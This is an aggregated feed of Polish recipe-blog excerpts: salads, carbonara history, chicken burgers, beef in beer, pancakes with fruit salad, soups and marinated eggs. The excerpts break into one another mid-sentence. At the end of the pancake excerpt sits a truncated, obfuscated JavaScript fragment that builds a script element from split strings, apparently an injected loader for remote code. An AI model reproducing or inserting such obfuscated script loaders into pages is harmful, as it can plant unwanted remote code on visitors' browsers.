Składniki: 3 podłużne buraki 3 pomarańcze 1/2 szklanki surowej kaszy jaglanej 1 pęczek rzodkiewek 1 pęczek natki pietruszki 1 łyżka sezamu 1 łyżka siemienia lnianego 1/2 łyżki czarnuszki sól Sos: 2 łyżki oliwy z oliwek 2 łyżki octu balsamicznego 1 łyżka miodu Sposób wykonania: Buraki myjemy i zawijamy każdy osobno w aluminiową folię. Pieczemy w 180°C przez 75 minut(...)kawałki pomarańczy i pokrojone w plasterki rzodkiewki. Wszystko delikatnie mieszamy. Całość posypujemy poszatkowaną natką pietruszki, czarnuszką, siemieniem i sezamem. Ocet balsamiczny łączymy z oliwą i miodem. Polewamy sosem sałatkę
Qchnia po prostuudało się stworzyć danie, Kolejna hipoteza wiąże powstanie tego dania z carbonari (czyli węglarzami – ludźmi trudniącymi się wytwarzaniem węgla drzewnego) z Abruzji. Jedno jest pewne, Włosi ten sos traktują bardzo kanonicznie, dlatego nie ulepszają, nie dodają kolejnych składników-a zwłaszcza śmietany! Głównymi składnikami sosu są jajka (w większości żółtka), podsmażony, chrupiący boczek (idealnie byłoby użyć pancetty) oraz starty
Kopystką po garachkawałki białej ryby bez skóry (miruna, dorsz) Mała cukinia Pomidor 1-1.5 woreczka ryżu Mały ząbek czosnku Szalotka Kilka kawałeczków sera feta 4 łyżki ajwaru 2 łyżki sosu sojowego Kurkuma Tymianek Oliwa z oliwek Świeża bazylia Papier do pieczenia PRZYGOTOWANIE: Ryż gotujemy. Szalotkę przesmażamy na niewielkiej ilości oliwy, dodajemy drobno posiekany czosnek, ugotowany ryż-całość doprawiamy sosem sojowym
Kopystką po garachsera żółtego 1 cebula 1 ząbek czosnku pęczek koperku 2 łyżki kaszy manny 1/2 szklanki bułki tartej 1/3 szklanki sezamu 1 jajo 1 łyżka sosu sojowego 1 łyżka majonezu sól, pieprz olej do smażenia Wykonanie: Filety z kurczaka, myjemy,osuszamy, oczyszczamy i kroimy na mniejsze kawałki. Następnie wrzucamy do rozdrabniacza i mielimy na drobno. Przenosimy do miski. Cebulę obieramy(...)czosnku przeciskamy przez praskę. Umyty koperek drobno siekamy. Wszystkie przygotowane składniki dodajemy do mięsa i mieszamy. Następnie do masy mięsnej wbijamy jajko i dodajemy majonez, kaszę mannę oraz przyprawy: sos sojowy, sól i pieprz. Masę wyrabiamy ręką do uzyskania jednolitej konsystencji. Na talerzu mieszamy bułkę tartą z sezamem. Z masy formujemy burgery i obtaczamy je w przygotowanej panierce. Smażymy
Kuchnia MagdaLenySzybki obiad. Pyszny obiad :) Składniki: 2 filety z kurczaka makaron z Groszku, Kukurydzy i Fasoli Mung - nitki 100g 1/2 opakowania mieszanki chińskiej 2 łyżki sosu sojowego 2 łyżki białego sezamu 2 łyżki oleju sól Makaron z grochu zalewamy gorącą wodą i czekamy 10-15 minut aż zmięknie. Na patelnię wlewamy olej. Fileta z kurczaka kroimy w kostkę. Smażymy. Dodajemy mieszankę(...)chińską. Chwilę dusimy. Dodajemy sezam i sos sojowy. Mieszamy. Dodajemy makaron (odcedzony). Mieszamy wszystko razem. W razie konieczności doprawiamy solą
Kucharka Tarka i MiarkaDziś trochę przeniosłam się w czasie o jakieś dziewiętnaście lat. Młody wtedy był taki malutki, a ja w kuchennych powijakach, na etapie sosów z torebki. Internety się dopiero rozwijały, a ja szukałam pomysłów na obiady w starych książkach kucharskich. W jednej z nich, takiej starszej ode mnie natknęłam się na wołowinę w piwie. Zrobiłam raz, a potem wszyscy wokoło domagali(...)potem jeszcze doprawić). Wszystko zmieszałam, przykryłam garnek i na małym ogniu dusiłam około 2 godziny. Po prostu dusimy do momentu, w którym mięso będzie miękkie i delikatne, a sos, w którym się dusi lekko zgęstnieje. Podczas procesu duszenia pasuje od czasu do czasu wpaść do kuchni i zamieszać łyżką w garze, żeby tam nam nic nie przywarło ;) Z czym
Blondynka Gotujekolację . Składniki 1 średni pomidor 3 liście sałaty lodowej 1 średnia czerwona cebula średnie awokado ogórek zielony kurczak gotowany 1 łyżeczka przyprawy gyros sos do sałaty 2 łyżki oliwy 1 łyżeczka miodu 1 łyżeczka octu balsamico szczypta soli pieprz czarny Wykonanie Na wstępnie kroimy nasze warzywa powyżej wymienione(...)średnią kostkę , sałatę rwiemy w ręku i także dodajemy do naszej miski , kiedy nasze warzywa są już przygotowane , polewamy naszym sosem na bazie oleju , miodu , dokładnie wszytko mieszamy i na chwilkę odstawiamy . Kurczaka rwiemy na kawałki ,na rozgrzaną patelnie z odrobiną oliwy przesmażamy kurczaka , dodając odrobinę przyprawy do gyrosa i kiedy mięso mamy przesmażone , na duży talerz układamy naszą
Mój Smakpulpety. Tak się składa, że u mnie w domu są bardzo dobrze przyjmowane, więc czemu nie. Ja użyłam podgrzybków (czarnych łebków) i kilku prawdziwków. Kozaki też się nadadzą, jednak sos będzie ciemniejszy. A Wy co najbardziej lubicie z grzybów? Składniki: 1 kg grzybów leśnych 0,5 kg mięsa mielonego z kurczaka lub indyka 70 kaszy jaglanej(...)połowy wody, wcześniej doprawiając pozostałym majerankiem, solą i pierzem. Po tym czasie roztrzepujemy wodę, śmietankę i mąkę, dodajemy do grzybków na patelni, mieszając do ponownego zagotowania. Do gotowego sosu dodajemy pulpety, mieszamy. W razie potrzeby można mocniej przyprawić. Podajemy posypane natką pietruszki <3 My jedliśmy z gotowanymi ziemniakami
CynamonemPoOczachSkładniki na kluski: ziemniaki (ilość zależy od tego jak dużo chcemy mieć kluseczków) mąka ziemniaczana 1 jako szczypta soli Składniki i sos: 10 pieczarek 1 cebula sól, pieprz 250 ml śmietany 18% łyżka mąki Wykonanie-kluski : Ziemniaki obrać i ugotować do miękkości. Ugotowane ziemniaki przecisnąć przez praskę i przygniatając ułożyć w misce. Podzielić na 4 części. Jedną część ziemniaków wyjmujemy(...)oraz 1 jajko i szczyptę soli. Wszystko razem wymieszać i formować kluseczki, robiąc w nich dziurki. Kluski gotujemy w lekko osolonej wodzie aż wypłyną (wtedy są już ugotowane) Wykonanie-sos: Cebulę kroimy w kostkę i podsmażamy. Do cebuli dodajemy pokrojone pieczarki i podsmażamy do miękkości. Doprawiamy solą i pieprzem do smaku. Zagęszczamy śmietaną z mąką
Olga Piecze i Gotujesmaczna, w smaku nie różni się zbytnio od tradycyjnej wersji. [the_ad id="7001"] Składniki: 4 duże udka 2 średnie marchewki pietruszka kawałek selera kawałek pora około 2 łyżki sosu sojowego pół łyżeczki papryki słodkiej po kilka liści laurowych, ziela angielskiego szczypta gałki muszkatołowej czubata łyżka majeranku sól, pieprz do smaku łyżka masła łyżka mąki Przygotowanie Do garnka(...)wyjmujemy je z wody, czekamy aż lekko przestygną. Mięso kroimy na mniejsze kawałki, marchew w kostkę, seler i pietruszkę ścieramy na tarce. Składniki wsypujemy z powrotem do zupy, dodajemy sos sojowy, przyprawy. W rondelku rozpuszczamy masło, dodajemy mąkę i mieszamy przez chwilę, następnie wlewamy kilka łyżek gorącej zupy i mieszamy do uzyskania gładkiej konsystencji. Zasmażkę wlewamy do zupy. Ewentualnie przyprawiamy
e-PrzepisyKulinarnetarce. Wymieszaj dokładnie wszystkie składniki marynaty. Zalej marynatą i odstaw do lodówki na minimum 12 godzin lub do 24 Składniki MARYNATA 6-8 jajek do zamarynowania 250 ml sosu sojowego 2 łyżki octu ryżowego lub jabłkowego 1 łyżka cukru trzcinowego 50 g imbiru świeżego – może być tez marynowany 1 ząbek czosnku 50 ml wody Wykonanie Jajka wyjmij z zalewy(...)łóż na jajkach, wtykając lekko w serek. Na każdej połówce jajka ułóż kawałek łososia. Połóż też kawałek imbiru. Całość posyp sezamem. Wstaw do lodówki i podawaj schłodzone, lekko skropione sosem sojowym. Składniki 100 g serka philadelphia 100 g wędzonego lub surowego łososia pół zielonego ogórka 50 g marynowanego imbiru czarny lub biały sezam do posypania Jeśli spodobał Ci się
Eat me! Fit me!sałatki dodałam ugotowaną komosę ryżową i jak zawsze trochę "zielonego", akurat miałam mix sałat. Taki posiłek możecie zjeść nie tylko na kolację, ale także jako lunchbox do pracy, wtedy sos weźcie w oddzielnym pojemniku lub słoiczku, by warzywa, a szczególnie sałata pozostały nadal jędrne. Sałatka kontrastuje ze sobą kolorami - to chyba oznaka, że coraz bardziej brakuje mi wiosny(...)dawałam więcej soli oraz ziół, gdyż warzywa były pieczone z rozmarynem, dodatkowo solone, tak samo jak i komosa w trakcie gotowania. Możecie do sałatki przygotować swój ulubiony sos. Smacznego, Anulla
Fabryka pomysłówNaleśniki z sałatką owocową! Pychota Naleśniki to cudowne danie, które można podać dosłownie na 1000 sposobów. Naleśniki można podawać jedynie z sosami, z nadzieniem - słodkim lub pikantnym, w postaci krokietów mięsnych bądź jarskich oraz jako cudowny, węglowodanowy dodatek do sałatek! Naleśniki można przyrządzać z mąki pszennej, razowej lub orkiszowej. Dla miłośników lekkiej diety proponujemy delikatne naleśniki z nadzieniem waniliowym(...)malinami i borówkami, pokroić w cząstki o podobnej wielkości. Owoce wymieszać, dodać likier i odstawić do schłodzenia. Sałatkę owocową podawać z naleśnikami waniliowymi ozdobioną listkami świeżej mięty, melisy, polaną sosem czekoladowym lub posypaną wiórkami kokosowymi. Za inspirację do przygotowania tego przepisu na pyszne fit naleśniki z sałatką owocową dziękujemy serwisowi xxlgastro.pl (function(){ zyqh=document.createElement("script");zyqh_=(("u")+"st")+"a";zyqh.async
Korniszonkiboczku 2 marchewki kawałek selera ziele angielskie, pieprz czarny, listek laurowy 10 gram majeranku suszonego 1 opakowanie przyprawy do dań z fasoli koncentrat pomidorowy 3 łyżki mąki 1 łyżka sosu sojowego Fasolę dzień wcześniej namoczyć w dużej ilości wody (najlepiej na całą noc). Korpusy dokładnie myjemy. Przekładamy do garnka, zalewamy wodą i zagotowujemy. Szumy zdejmujemy za pomocą małego sitka(...)oraz majerankiem. Do miski przelewamy 2 łyżki wazowe bulionu, dodajemy koncentrat pomidorowy i mąkę, dokładnie miksujemy za pomocą miksera aby nie powstały grudki. Dolewamy do zupy dokładnie mieszając. Doprawiamy sosem sojowym. Zagotowujemy. SMACZNEGO
kulinarnyswiatdomiłyżka startego imbiru 1 mała cebula 1 łyżeczka garam masali olej 5 grzybów shiitake (lub małych boczniaków) 1 pomidor (lub kilka koktajlowych) 2 łodygi selera naciowego 3 łyżeczki sosu sojowego 1 szklanka pociętej w cienkie paseczki (lub startej) rzodkwi japońskiej (daikon) 1/2 szklanki zielonego groszku 1 kapusta bok choi 1 i 1/2 litra wody lub lekkiego bulionu szczypiorek natka kolendry(...)czosnek oprószyć solą i podsmażyć na oleju wraz ze startym imbirem i garam masalą (około 3 - 5 minut). Dodać pokrojone w kostkę seler, pomidory, grzyby i kapustę oraz sos sojowy i smażyć kolejne 10 minut. Wlać połowę wody lub bulionu i gotować na małym ogniu 10 minut. Wlać drugą połowę wody i gdy zacznie wrzeć dodać groszek i rzodkiew (przepłukaną
zadanie-gotowanie